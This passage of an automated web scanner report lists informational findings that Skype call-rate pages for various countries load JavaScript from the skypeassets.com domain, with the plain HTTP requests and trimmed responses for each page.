Path:   /intl/en-us/prices/call-rates/cheap-calls-to-poland

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-poland HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.760. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-portugal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-portugal

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-portugal HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.761. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-puerto-rico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-puerto-rico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-puerto-rico HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:27 GMT
Server: Apache
Accept-Ranges: bytes
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.762. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-russia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-russia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-russia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:27 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.763. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-singapore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-singapore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-singapore HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:27 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.764. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-south-korea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-south-korea

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-south-korea HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.765. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-spain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-spain

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-spain HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:27 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.766. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-sweden  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-sweden

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-sweden HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.767. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-switzerland  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-switzerland

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-switzerland HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.768. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-taiwan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-taiwan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-taiwan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.769. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tanzania  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-tanzania

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-tanzania HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.770. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-thailand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-thailand

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-thailand HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.771. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-the-democratic-republic-of-the-congo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-the-democratic-republic-of-the-congo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-the-democratic-republic-of-the-congo HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.772. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-timor-leste  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-timor-leste

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-timor-leste HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.773. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-togo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-togo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-togo HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.774. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tokelau  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-tokelau

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-tokelau HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
